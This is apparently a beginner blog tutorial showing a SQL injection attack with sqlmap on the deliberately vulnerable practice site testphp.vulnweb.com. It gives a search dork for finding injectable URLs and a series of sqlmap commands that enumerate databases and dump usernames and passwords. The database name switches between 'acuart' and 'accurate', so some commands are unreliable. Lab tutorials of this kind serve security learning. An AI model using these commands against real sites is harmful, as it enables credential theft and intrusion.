SQL Injection Attack Using sqlmap Tool
In this article, I’ll elaborate on a step-by-step method of using the sqlmap tool.
We will attack the sample website, not the live website. Therefore, it would be illegal to try on somebody else’s website. It would be best if you tried it on your website; otherwise, you can try it on a sample website.
Requirements
- Kali Linux Machine (attacking machine)
- sqlmap tool
Let’s Start…..
- Open browser
- Type:
Vulnweb.com
As you can see on the screen, there are four links available. I used the link for ‘acuart’.
Here, we want to find the username and password.
- Copy the link
- Open new tab
- Type:
site:<paste-website-link> php?id=It will help you to find the links.
http://testphp.vulnweb.com/artists.php?artist=1You see that this type of link is what we need to attack. So, copy it.
- Open the terminal of the Kali Linux machine.
- Type:
sqlmap -u <paste-link> --dbs
You see, we have two databases here.
Information_schema is the default database; we will use the accuratedatabase to find the number of tables.
- Type:
sqlmap -u <paste_link> -D acuart --tablesAfter running this command, it shows the table names.
I will use the users’ table name to find the number of columns.
- Type:
sqlmap -u <Link> -D accurate -T users --columnsAfter running this command, it shows the column name.
I will use the name table name to find the username.
- Type:
sqlmap -u <link> -D acuart -T users -C uname --dump
You see, it will give us the username.
So, again, I will use the pass table name to find the password.
- Type:
sqlmap -u <link> -D accurate -T users -C pass --dumpYou see, it will give us the password.
You see that the username and password were found and cracked successfully.
Thank You for reading this article. I hope that you have found this information provided to be valuable and helpful. Use it for educational purposes only…. 🙂
RADEEL AHMAD
